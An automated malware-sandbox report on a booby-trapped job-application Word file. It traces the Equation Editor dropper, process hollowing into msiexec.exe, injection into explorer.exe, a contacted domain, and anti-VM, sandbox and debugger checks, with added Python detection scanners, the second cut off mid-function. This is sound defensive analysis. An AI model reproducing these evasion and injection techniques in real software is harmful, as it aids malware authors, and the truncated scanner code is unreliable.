          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0250FDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FD8C NtDelayExecution,LdrInitializeThunk,7_2_0250FD8C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510048 NtProtectVirtualMemory,7_2_02510048
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510078 NtResumeThread,7_2_02510078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510060 NtQuerySection,7_2_02510060
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025110D0 NtOpenProcessToken,7_2_025110D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511148 NtOpenThread,7_2_02511148
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251010C NtOpenDirectoryObject,7_2_0251010C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025101D4 NtSetValueKey,7_2_025101D4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FA50 NtEnumerateValueKey,7_2_0250FA50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FA20 NtQueryInformationFile,7_2_0250FA20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAD0 NtAllocateVirtualMemory,7_2_0250FAD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAB8 NtQueryValueKey,7_2_0250FAB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FBE8 NtQueryVirtualMemory,7_2_0250FBE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F8CC NtWaitForSingleObject,7_2_0250F8CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511930 NtSetContextThread,7_2_02511930
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F938 NtWriteFile,7_2_0250F938
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FE24 NtWriteVirtualMemory,7_2_0250FE24
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FEA0 NtReadVirtualMemory,7_2_0250FEA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FF34 NtQueueApcThread,7_2_0250FF34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FFFC NtCreateProcessEx,7_2_0250FFFC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02510C40 NtGetContextThread,7_2_02510C40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC48 NtSetInformationFile,7_2_0250FC48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC30 NtOpenProcess,7_2_0250FC30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC90 NtUnmapViewOfSection,7_2_0250FC90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FD5C NtEnumerateKey,7_2_0250FD5C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02511D80 NtSuspendThread,7_2_02511D80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A360 NtCreateFile,7_2_0012A360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A410 NtReadFile,7_2_0012A410
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A490 NtClose,7_2_0012A490
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A35A NtCreateFile,7_2_0012A35A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A40A NtReadFile,7_2_0012A40A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012A48A NtClose,7_2_0012A48A
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: 76E90000 page execute and read and write
          Source: seasonzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: seasonhd72463.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C.V_Job Request.docVirustotal: Detection: 50%
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$V_Job Request.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDECA.tmp
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/10@2/1
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
          Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmpBinary or memory string: insert into mediaitem (name, type, checked_to_patron_id, checkout_date, due_date) values (@name, @type, @patron_id, @co_date, @due_date);
          Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmpBinary or memory string: select id, name, type, checked_to_patron_id, checkout_date, due_date from mediaitem {0} order by name;where checked_to_patron_id = Mwhere checked_to_patron_id is not nullaselect id, name, type from patron where id = {0}_select id, name, type from patron order by nameWThe method or operation is not implemented.9Library.Properties.Resources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C.V_Job Request.docJoe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpacker
          Source: seasonzx[1].exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: seasonhd72463.exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.6.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.1.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.10.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.seasonhd72463.exe.1100000.5.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.4.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.8.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.seasonhd72463.exe.1100000.3.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00417162 push ebp; ret 5_2_00417163
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004165E8 push es; retf 5_2_004165E9
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041CE35 push edi; ret 5_2_0041CE36
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004176DE push ebp; iretd 5_2_004176A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041768B push ebp; iretd 5_2_004176A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096DFA1 push ecx; ret 5_2_0096DFB4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029E9B5 push esp; retn 0000h5_2_0029EAE7
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029EB02 push esp; retn 0000h5_2_0029EB03
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029EB1E push esp; retn 0000h5_2_0029EB1F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251DFA1 push ecx; ret 7_2_0251DFB4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00127162 push ebp; ret 7_2_00127163
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012E3EF push esp; ret 7_2_0012E3F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D4B5 push eax; ret 7_2_0012D508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D502 push eax; ret 7_2_0012D508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D50B push eax; ret 7_2_0012D572
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012D56C push eax; ret 7_2_0012D572
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_001265E8 push es; retf 7_2_001265E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012768B push ebp; iretd 7_2_001276A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_001276DE push ebp; iretd 7_2_001276A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0012CE35 push edi; ret 7_2_0012CE36
          Source: initial sampleStatic PE information: section name: .text entropy: 7.54284746889
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEB
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drStream path '_1696858091/equatIoN naTivE' entropy: 7.99604139076 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match, File source: 4.2.seasonhd72463.exe.25c09b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: seasonhd72463.exe PID: 1812, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Binary or memory string: SBIEDLL.DLL
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, RDTSC instruction interceptor: first address: 0000000000409904, second address: 000000000040990A, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, RDTSC instruction interceptor: first address: 0000000000409B7E, second address: 0000000000409B84, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
(Two time-stamp-counter reads a few instructions apart, with the first value parked in ecx: the delta between them is compared against a threshold, and the inflated delta produced by an emulator, an instrumented hypervisor or a single-stepping debugger is what the check keys on.)

Further evasion-related observations (untitled in the source):
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564, Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1444, Thread sleep time: -33027s >= -30000s
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1232, Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1268, Thread sleep time: -38000s >= -30000s
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Code function 5_2_00409AB0: rdtsc
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Thread delayed: delay time: 33027
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Thread delayed: delay time: 922337203685477
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmp, Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp, Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmp, Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.510337596.000000000457A000.00000004.00000001.sdmp, Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idechJ
Source: explorer.exe, 00000006.00000000.438642662.000000000029B000.00000004.00000020.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmp, Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Code function 5_2_00409AB0: rdtsc
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe, Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Code function 5_2_009726F8: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe, Code function 7_2_025226F8: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe, Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Code function 5_2_0040ACF0: LdrLoadDll
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Memory allocated: page read and write | page guard

Note: the VMware device-tree strings attributed to explorer.exe are the sandbox host's own Plug and Play data sitting in the memory of the process the payload was injected into; the strings attributed to seasonhd72463.exe (the VMware Tools install path and registry key, SBIEDLL.DLL, the Wine-only kernel32 export) are the lookup keys the sample itself carries. fs:[30h] is the 32-bit PEB, and reading it together with the DebugPort process query is the standard in-process debugger check; the same pair shows up in msiexec.exe because the injected payload runs there too.
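The checks the sandbox flagged in this section can be reproduced offline against a memory dump or an unpacked PE. The scanner below is an added example, not Joe Sandbox code and not code from the sample: it looks for the sandbox and emulator strings reported above (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME), the VMware device and registry strings, and two RDTSC instructions close together, which is the shape of the timing probe at 0x409904 (rdtsc; xor ecx,ecx; add ecx,eax; rdtsc). The indicator labels, the 12-byte window for the RDTSC pair and the sample buffer at the bottom are constructed for this example.

```python
"""Triage scanner for the anti-analysis indicators listed above (added example)."""
import re
from collections import defaultdict

# Indicator strings, taken from the memory strings reported above. Matching is
# case-insensitive because the sample upper-cased some of them (SBIEDLL.DLL).
SANDBOX_STRINGS = {
    b"SBIEDLL.DLL": "Sandboxie (SbieDll.dll loaded in-process)",
    b"WINE_GET_UNIX_FILE_NAME": "Wine (kernel32 export that real Windows lacks)",
}
VM_STRINGS = {
    b"VMware SVGA II": "VMware display adapter name",
    b"VMWARE\\VMWARE TOOLS": "VMware Tools install path",
    b"SOFTWARE\\VMware, Inc.\\VMware Tools": "VMware Tools registry key",
    b"VEN_VMWARE": "VMware virtual disk PnP ID",
}

# rdtsc encodes as 0F 31. Two of them within a few bytes is the timing probe:
# the delta between the two reads is compared against a threshold, and an
# emulator or single-stepping debugger makes the delta far too large.
RDTSC_PAIR = re.compile(rb"\x0f\x31.{0,12}?\x0f\x31", re.DOTALL)


def scan_for_evasion(blob: bytes) -> dict:
    """Return {category: [hits]} for every indicator found in blob."""
    hits = defaultdict(list)
    lowered = blob.lower()  # only ASCII letters change, so offsets stay valid
    for needle, label in SANDBOX_STRINGS.items():
        offset = lowered.find(needle.lower())
        if offset != -1:
            hits["sandbox_strings"].append((label, offset))
    for needle, label in VM_STRINGS.items():
        offset = lowered.find(needle.lower())
        if offset != -1:
            hits["vm_strings"].append((label, offset))
    for match in RDTSC_PAIR.finditer(blob):
        hits["rdtsc_pairs"].append(match.start())
    return dict(hits)


def is_evasive(hits: dict) -> bool:
    """Any single category is enough to route the buffer to manual review."""
    return any(hits.get(k) for k in ("sandbox_strings", "vm_strings", "rdtsc_pairs"))


# Constructed dump: a fake MZ stub, the rdtsc probe, then a few of the strings.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 12                    # offsets 0..15
    + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"           # offset 16: rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x00" * 8                                   # offsets 24..31
    + b"SbieDll.dll\x00"                            # offset 32
    + b"VMware SVGA II\x00"                         # offset 44
    + b"SOFTWARE\\VMware, Inc.\\VMware Tools\x00"   # offset 59
)

if __name__ == "__main__":
    result = scan_for_evasion(SAMPLE_DUMP)
    for category, found in result.items():
        print(category, found)
    print("evasive:", is_evasive(result))
```

Run it against the .raw.unpack dumps listed under the Yara matches above to confirm which strings are literal lookups of the sample; a single string hit is weak evidence (the explorer.exe VMware strings show why), whereas the RDTSC pair is code, not data, and does not occur by accident.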

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.lenovoidc.com

Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B50000

Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe, Memory written: C:\Users\user\AppData\Roaming\seasonhd72463.exe base: 400000 value starts with: 4D5A
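The three observations above (an MZ-headed buffer written at base 0x400000, execute+read+write sections mapped into explorer.exe and msiexec.exe, and msiexec.exe's own image unmapped at 0xB50000) are what memory forensics finds afterwards as private executable regions that a loader never created. The check below is an added example, not Joe Sandbox code and not the sample's code: it walks a list of memory regions in the shape of MEMORY_BASIC_INFORMATION (base, protection, type, contents) and flags, malfind-style, executable regions that are not image-backed, distinguishing those carrying a full PE header from raw code. The region list is constructed to mirror the report; the dict layout is this example's assumption, as is the reading of the dump names above (for example ...0000000000370000.00000040.00020000) as base, protection 0x40 = PAGE_EXECUTE_READWRITE and type 0x20000 = MEM_PRIVATE.

```python
"""Malfind-style scan for injected PE images in a process's memory regions (added example)."""
import struct

# Win32 protection and region-type constants (MEMORY_BASIC_INFORMATION fields).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_GUARD = 0x100
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # every PAGE_EXECUTE* variant
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000


def has_pe_header(data: bytes) -> bool:
    """True if data begins with an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_injected_regions(regions: list) -> list:
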